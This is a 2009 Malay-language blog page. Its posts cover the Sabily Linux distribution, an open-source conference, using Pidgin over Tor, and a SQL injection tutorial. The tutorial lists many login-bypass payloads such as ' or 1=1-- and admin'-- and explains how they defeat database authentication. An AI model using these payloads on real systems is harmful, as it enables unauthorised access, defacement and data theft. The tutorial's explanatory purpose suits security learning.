Custom Search

Ahad, 24 Mei 2009

Mengapa Saya Pilih Sabily? (Dikemaskini)

Assalamualaikum dan selamat sejahtera semua,

Sudah genap dua bulan rasanya saya menggunakan Sabily (Ubuntu Muslim Edition). Pelbagai masalah yang saya telah tempuh sepanjang dua purnama namun untuk berpatah balik ke Windows tidak sekali-kali.

Tidak adil rasanya untuk membandingkan sistem operasi propreitary dengan sistem operasi sumber terbuka, seperti membandingkan epal dengan oren. Namun begitu, Sabily tetap mempunyai pelbagai keistimewaan yang tidak ada pada sistem operasi propreitary seperti Windows.

Selain perisian yang sudah disertakan sekali dengan Ubuntu yang asal seperti OpenOffice.org,Scribus,Pidgin,Brasero,Rythmbox dan GIMP sebagai contoh, Sabily disertakan perisian Islamik seperti Zekr,Minbar,Hijri, Monajat dan Ensiklopedia Thwab.

Juga disertakan perisian pendidikan Gcompris, Brasero (tapi saya lebih suka K3b) untuk burn CD/DVD atau buat imej ISO,codec untuk audio/video, VLC Media Player, dan perisian Sistem Operasi Virtual, VirtualBox OSE yang membolehkan anda menjalankan sistem operasi Windows di dalam Sabily dan tidak lupa juga Compiz Fusion, efek desktop yang dicemburui oleh pengguna Windows :D.

Di sini saya sertakan beberapa screenshot untuk tatapan anda. Sila klik pada gambar utk gambar yg lebih jelas.

Zekr

Minbar Prayer Times

Pray Times! (Add-on Firefox)

Compiz Fusion

K3b

Rabu, 20 Mei 2009

Silat SQL: Pengenalan dan Suntikan Asas Secara Umum

Salam sejahtera semua,

Artikel kali ini akan membicarakan mengenai suntikan SQL. Kelemahan keselamatan laman sesawang berasaskan suntikan (injection flaw) mendapat tempat kedua sebagai kelemahan yang paling banyak ditemui di dalam aplikasi sesawang. [Sila rujuk http://www.owasp.org/index.php/Top_10_2007]. Oleh itu teknik suntikan SQL walaupun nampak remeh, namun hakikatnya berbisa.

Suntikan SQL asas

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

'or'1'='1

'or'a'='a

' or 1=1 #

1=1

"1'or'1'='1

1'or'1'='1

' or '1' = '1

admin'--

admin' --

admin' #

admin'/*

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1--

'or"='


"My password is ' or 1=1--" adalah antara ungkapan yang menerangkan magic quote SQL untuk memintas halangan pengesahan log masuk sama ada pengguna biasa (user) atau pun pentadbir (admin). Daripada memasukkan nama pengguna dan katalauan yang sah, seorang penyerang akan menggunakan ungkapan SQL sebagai galang gantinya.

Contoh:

Nama Pengguna: ' or 1=1 --
Kata Laluan : ' or 1=1 --


Seorang penyerang mungkin dapat memintas pengesahan (authentication) pentadbir dan sekaligus dapat menjalankan tugasan sebagai seorang pentadbir sekiranya sistem log masuk tersebut menggunakan pangkalan data(database). Kelebihan sebagai pentadbir membolehkan seorang penyerang itu mengubah laman sesawang (website defacement), menebuk pintu belakang (planting backdoor), mahupun mencuri data sulit pengguna-pengguna di dalam sistem aplikasi web tersebut.


Mungkin anda semua akan membangkitkan persoalan kenapa dalam suntikan sql, untuk memintas log masuk kita akan gunakan string ' or 1=1--

Bila kita tengok semula, kemungkinan kenyataan yang digunakan untuk log masuk adalah :

SELECT Request.Form("pengguna") and Request.Form("katalaluan") FROM usertable


pemboleh ubah pengguna dan katalaluan digunakan untuk mengambil input yang dimasukkan oleh pengguna.

Dalam kenyataan di atas, sekiranya pengguna masukkan pengguna dan katalaluan yang betul, baru kenyataan tersebut akan dijalankan.

Para penggodam pula akan bermain-main dengan logik kat sini. Bila seseorang penggodam itu memasukkan ' or 1=1--, kenyataan di atas akan berubah menjadi:

SELECT ' or 1=1-- and ' or 1=1-- FROM usertable


tanda tick (') digunakan untuk break(pecahkan) kenyataan sql, tanda -- untuk komen yang bermaksud aplikasi sesawang tidak akan melaksanakan apa-apa kenyataan selepas tanda --.

or bermaksud atau, 1=1 bermaksud kita reka satu kenyataan yang benar, jadi, bila kenyataan sql ni jumpa 1=1 dia akan anggap benar. Sebab inilah yang membolehkan kita memintas log masuk. Kita boleh juga memasukkan 2=2, 3=3, yang penting kenyataan tersebut adalah benar.

Bila kita memintas log masuk dengan cara ni, kita akan dapat masuk dengan kelebihan (privillege) user yang paling atas dalam database. Selalunya pentadbir (admin).

Kenyataan di bawah ini lebih jelas untuk kita semua perhatikan:

SELECT 'id' and 'or '1'='1 and 'or '1'='1 FROM usertable

Bersambung ke Suntikan SQL Asas : MySQL 4 dan MySQL 5

Artikel ini merupakan sebahagian dari buku elektronik (e-book) "Silat SQL" yang merupakan rancangan penulis untuk menerbitkannya dan dilesenkan dengan Metasploit Framework License bagi mengelakkannya dieksploitasi secara komersil oleh pihak yang tidak bertanggungjawab dalam menghargai sumbangan komuniti
sumber terbuka.

Buku ini akan diedarkan secara percuma bagi menghargai konsep sumber terbuka dan falsafah ilmu yang merupakan hakmilik mutlak Yang Maha Mengetahui dan tidak wajar dihakciptakan oleh manusia.

Penulis mengucapkan jutaan terima kasih dan setinggi penghargaan kepada semua ahli HM Security Team terutama kepada Saudara ghimau yang menjadi antara sumber inspirasi penulis dalam dunia komuniti 'securityunderground', Crew,VVIP, VIP dan ahli-ahli biasa HMSecurity. Tidak lupa juga kepada komuniti sumber terbuka di seantero dunia.

Sebarang penyalahgunaan maklumat di dalam artikel ini adalah tanggungjawab mereka yang terlibat dan bukan merupakan tanggungjawab penulis.

Isnin, 18 Mei 2009

Muat turun Sabily 9.04

Sila gunakan Wuala Client untuk memudahkan anda memindah turun ISO sabily.

http:\\www.wuala.com

Sila cari berdasarkan keyword "sabily" atau tambah "jmehdi" sebagai kenalan anda di Wuala.

MSC Malaysia OSCONF 2009


The 2009 MSC Malaysia Open Source Conference
INVITATION TO PARTICIPATE IN MSC MALAYSIA OPEN SOURCE CONFERENCE 2009

Date: 31 May - 3 June, 2009
Venue: Berjaya Times Square Hotel & Convention Center, Kuala Lumpur.

MSC Malaysia's inaugural and full-fledged Open Source Conference to incorporate a "Quadruple play" of 4 crucial stakeholders consisting of government, businesses, developers and community in envisioning open source's contribution to the IT industry and socio-economy.

Positioned as International forum for sharing and exchanging ideas on technical advancements, applications, development and business cases on open source, and its positive impact in meeting challenges of the current economic climate.

Organised by MSC Malaysia in cooperation with the Malaysian Administrative Modernisation and Management Planning Unit (MAMPU), the annual MSC Malaysia OSCONF is also supported by the Malaysian Open Source community. This event complements the annual Malaysian Government Open Source Software Conference (MyGOSSCON) as the premier platform for all things Open Source in Malaysia.

With 3 DAYS, 3 TRACKS, 1 HACKATHON are in store for everyone who attend this conference. In addition, we have renowned speakers from prime Open Source Enterprises which are Mozilla, Google and Red Hat to name a few and also not forgeting from the developer community - Ubuntu, BSD, Fedora, PHPs, etc

Come join us at the MSC Malaysia Open Source Conference 2009! You'll be pleasantly surprised...
Who should attend?

* Business executives from MSC Malaysia and Non-MSC Malaysia Status companies
* Open Source developers, communities, inventors, evangelist, researchers, strategist
* Government officers
* Students, general public

Why you should attend?

1. Provide exposure and knowledge on the importance of Open Source in enhancing competitiveness by giving freedom of choice in software usage with lower total cost of ownership, hence benefiting businesses and society at large. Over 30 session tracks are made available.
2. Share amongst the open source community on new directions and latest innovations by the subject matter experts, thought leaders and industry gurus.
3. Provide a platform for conference participants to actively interact, share and exchange views, ideas, and tools on the latest trends and issues of Open Source.
4. Networking, learning and having great fun!

Assalamualaikum dan Selamat Sejahtera semua,

Mungkin ramai yang dah tahu, tapi tak apalah, saya ceritakan juga. Pada 31 Mei hingga 3 Jun ini akan diadakan Persidangan Sumber Terbuka 2009 MSC Malaysia yang julung-julung kalinya diadakan di Malaysia. Tempatnya adalah Berjaya Times Square Hotel & Conference Centre.

Ramai tokoh-tokoh dalam arena sumber terbuka global dan tempatan akan turut serta dalam persidangan ini dengan membentangkan kertas kerja atau menyampaikan syarahan mereka mengenai projek sumber terbuka di mana mereka terlibat.

Antara pembentang adalah:

Chris DiBona, Pengurus Program Sumber Terbuka Google. Antara tugas Chris adalah Google Summer of Code dan kod perisian sumber terbuka di http://code.google.com

Anthony Baxter dari Google Australia, Python guru.

Matthew Olander, ahli Pemasaran Projek FreeBSD.

Tak lupa juga pembangun dan otai sumber terbuka Malaysia, antaranya:

Redhuan D. Oon atau "Red1", ketua projek ADempiere ERP.

Amir Haris Ahmad pengasas zonestraits.com. Blog saya juga ada menggunakan domain di bawah projek zonestraits.com iaitu Blog KaibaTheLegacy, http:\\ak47suk1.via.my

Jangan mengaku penggodam Malaysia kalau Amir pun anda tak kenal. Pasal apa? Saya tak nak cerita di sini, anda semua carilah sendiri pasal sudut gelap sejarah Amir ni. Hehehe :D

Hackathon pada 31 Mei ni percuma. Datanglah beramai-ramai. Saya sendiri Insya-Allah jika tiada sebarang halangan akan pergi juga ke sana. Sebab tak pasti lagi tempat penginapan sepanjang 4 hari nanti. Nak kena pastikan dulu. :)

Konferens 3 hari juga harganya agak berpatutan bagi pelajar cuma RM50, jangan lupa bawa kad matrik. Kalau tak, kena cas penuh :lol:

Maklumat lanjut boleh tengok sini.

http://www.mscmalaysia.my/article/open+Source+Conference/OSCONF

Selasa, 12 Mei 2009

Guna Pidgin dengan Tor

Assalamualaikum dan Salam Sejahtera Semua,

Hari ini saya akan menunjukkan cara-cara untuk menggunakan Tor dengan Pidgin di Ubuntu.

Kenapa perlu gunakan Tor?

Sesetengah pejabat,sekolah,pusat pengajian tinggi atau mana-mana lokasi menghalang akses kepada Yahoo Messenger dengan ketetapan di firewall. Tor adalah satu perisian proksi yang dapat menembusi tembok halangan tersebut. Insya-Allah :)

Bagaimana untuk pasang Tor?

1.Tambahkan ppa berikut ke repositori anda (Repositori boleh diakses di System > Administration > Software Sources)

deb http://mirror.noreply.org/pub/tor jaunty main

2. Klik Close

3. Buka Terminal.

4. Taip arahan berikut di Terminal.

sudo su

gpg --keyserver keys.gnupg.net --recv 94C09C7F

gpg --fingerprint 94C09C7F

gpg --export 94C09C7F | sudo apt-key add -

apt-get update

apt-get install tor

5. Selepas selesai proses pemasangan, sila reboot pc anda.

6. Buka Pidgin Internet Messenger

7. Pergi ke Accounts > Manage Account

8. Klik pada akaun YM anda dan klik Modify



9. Klik tab Advanced

10. Klik drop-down menu Proxy Type dan pilih SOCKS 5


11. Setkan


Host: 127.0.0.1
Port:9050

12. Klik Save.

13. Hilang Tandakan Akaun YM anda di Accounts dan tandakan semula. Atau anda boleh restart Pidgin.

14. Mudah bukan?

Ahad, 3 Mei 2009

Panduan mudah kemaskini Ubuntu ME ke Sabily Jaunty

Salam semua,

Hari ini saya ingin berkongsi dengan anda bagaimana untuk mengemaskini Ubuntu Muslim Edition Intrepid ke Sabily Jaunty.

1. Pergi ke System > Administration > Update Manager

2. Klik Upgrade.

3. Ikut arahan yang diberikan.

4. Boot semula.

5. Pergi ke System > Administration > Software Sources.

6. Hidupkan Third Party Software yang dimatikan semasa proses kemaskini.

ATAU sekiranya anda ingin mengubah Ubuntu asal kepada Sabily Jaunty

7. Jalankan arahan ini di Terminal.

sudo wget http://www.sabily.org/sources.list.d/`lsb_release -cs`.list
--output-document=/etc/apt/sources.list.d/sabily.list;
sudo apt-get -q update;
sudo apt-get --yes -q --allow-unauthenticated install sabily-keyring;
sudo apt-get -q update

sudo aptitude install sabily


7. Jawab yes ketika diperlukan

carian google

Custom Search